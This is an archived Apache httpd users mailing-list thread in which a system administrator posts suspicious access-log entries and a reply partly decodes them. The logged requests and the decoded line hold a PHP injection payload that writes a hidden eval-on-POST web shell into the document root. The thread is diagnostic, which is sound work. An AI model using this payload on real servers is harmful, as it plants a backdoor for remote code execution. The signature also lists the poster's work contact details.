Return-Path: X-Original-To: archive-asf-public-internal@cust-asf2.ponee.io Delivered-To: archive-asf-public-internal@cust-asf2.ponee.io Received: from cust-asf.ponee.io (cust-asf.ponee.io [163.172.22.183]) by cust-asf2.ponee.io (Postfix) with ESMTP id C9849200C13 for ; Mon, 6 Feb 2017 17:37:01 +0100 (CET) Received: by cust-asf.ponee.io (Postfix) id C7B72160B56; Mon, 6 Feb 2017 16:37:01 +0000 (UTC) Delivered-To: archive-asf-public@cust-asf.ponee.io Received: from mail.apache.org (hermes.apache.org [140.211.11.3]) by cust-asf.ponee.io (Postfix) with SMTP id 1D011160B53 for ; Mon, 6 Feb 2017 17:37:00 +0100 (CET) Received: (qmail 7583 invoked by uid 500); 6 Feb 2017 16:36:59 -0000 Mailing-List: contact users-help@httpd.apache.org; run by ezmlm Precedence: bulk Reply-To: users@httpd.apache.org list-help: list-unsubscribe: List-Post: List-Id: Delivered-To: mailing list users@httpd.apache.org Received: (qmail 7567 invoked by uid 99); 6 Feb 2017 16:36:59 -0000 Received: from pnap-us-west-generic-nat.apache.org (HELO spamd4-us-west.apache.org) (209.188.14.142) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Feb 2017 16:36:59 +0000 Received: from localhost (localhost [127.0.0.1]) by spamd4-us-west.apache.org (ASF Mail Server at spamd4-us-west.apache.org) with ESMTP id 36273C0C68 for ; Mon, 6 Feb 2017 16:36:59 +0000 (UTC) X-Virus-Scanned: Debian amavisd-new at spamd4-us-west.apache.org X-Spam-Flag: NO X-Spam-Score: -5.32 X-Spam-Level: X-Spam-Status: No, score=-5.32 tagged_above=-999 required=6.31 tests=[RCVD_IN_DNSWL_MED=-2.3, RCVD_IN_MSPIKE_H3=-0.01, RCVD_IN_MSPIKE_WL=-0.01, RP_MATCHES_RCVD=-2.999, SPF_PASS=-0.001] autolearn=disabled Received: from mx1-lw-eu.apache.org ([10.40.0.8]) by localhost (spamd4-us-west.apache.org [10.40.0.11]) (amavisd-new, port 10024) with ESMTP id B-D8Mm4JfPFk for ; Mon, 6 Feb 2017 16:36:55 +0000 (UTC) Received: from aserp1040.oracle.com (aserp1040.oracle.com [141.146.126.69]) by mx1-lw-eu.apache.org (ASF Mail Server at mx1-lw-eu.apache.org) with ESMTPS id 84A2C5FAF3 for ; Mon, 6 Feb 2017 16:36:54 +0000 (UTC) Received: from userv0022.oracle.com (userv0022.oracle.com [156.151.31.74]) by aserp1040.oracle.com (Sentrion-MTA-4.3.2/Sentrion-MTA-4.3.2) with ESMTP id v16Gaf7k006548 (version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=OK) for ; Mon, 6 Feb 2017 16:36:41 GMT Received: from userv0121.oracle.com (userv0121.oracle.com [156.151.31.72]) by userv0022.oracle.com (8.14.4/8.14.4) with ESMTP id v16GaeBa031970 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-GCM-SHA384 bits=256 verify=OK) for ; Mon, 6 Feb 2017 16:36:41 GMT Received: from abhmp0019.oracle.com (abhmp0019.oracle.com [141.146.116.25]) by userv0121.oracle.com (8.14.4/8.13.8) with ESMTP id v16Gaeo8006431 for ; Mon, 6 Feb 2017 16:36:40 GMT MIME-Version: 1.0 Message-ID: <6eafa535-9eff-4729-8e4c-e27e2d91f199@default> Date: Mon, 6 Feb 2017 08:36:40 -0800 (PST) From: Jack Swan To: X-Mailer: Zimbra on Oracle Beehive Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline X-Source-IP: userv0022.oracle.com [156.151.31.74] Subject: Re: [users@httpd] am i hacked ? archived-at: Mon, 06 Feb 2017 16:37:02 -0000 I didn't decode it all. I'll leave the rest up to you, but the %characters= are hexadecimal characters. Look up hex charset. =20 So the first line translates to (I may have missed a char or two...) GET/?1=3D@ini_set("display_errors", 0);set_time_limit("0");@set_magic_quote= s_runtime();echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webco= nfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-'= ; ----- Original Message ----- From: bernd.lentes@helmholtz-muenchen.de To: users@httpd.apache.org Sent: Monday, February 6, 2017 11:15:04 AM GMT -05:00 US/Canada Eastern Subject: [users@httpd] am i hacked ? Hi, just in the moment i found two very weird entries in may access_log: 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=3D%40ini_set%28%= 22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_= quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERV= ER%5B%27DOCUME NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCg= kX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=3D%40ini_set%28%= 22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_= quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERV= ER%5B%27DOCUME NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCg= kX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90 What upsets me is that these two requests have statuscode 200, which mean i= t was successfull. The IP is from ukraine. Where can i find out what these %charcacters mean ?= Does anyone understand what happened here ? It's apache 2.2.3 64bit. Thanks for any hint. Bernd --=20 Bernd Lentes=20 Systemadministration=20 institute of developmental genetics=20 Geb=C3=A4ude 35.34 - Raum 208=20 HelmholtzZentrum M=C3=BCnchen=20 bernd.lentes@helmholtz-muenchen.de=20 phone: +49 (0)89 3187 1241=20 fax: +49 (0)89 3187 2294=20 Erst wenn man sich auf etwas festlegt kann man Unrecht haben=20 Scott Adams Helmholtz Zentrum Muenchen Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH) Ingolstaedter Landstr. 1 85764 Neuherberg www.helmholtz-muenchen.de Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons En= hsen Registergericht: Amtsgericht Muenchen HRB 6466 USt-IdNr: DE 129521671 --------------------------------------------------------------------- To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org For additional commands, e-mail: users-help@httpd.apache.org --------------------------------------------------------------------- To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org For additional commands, e-mail: users-help@httpd.apache.org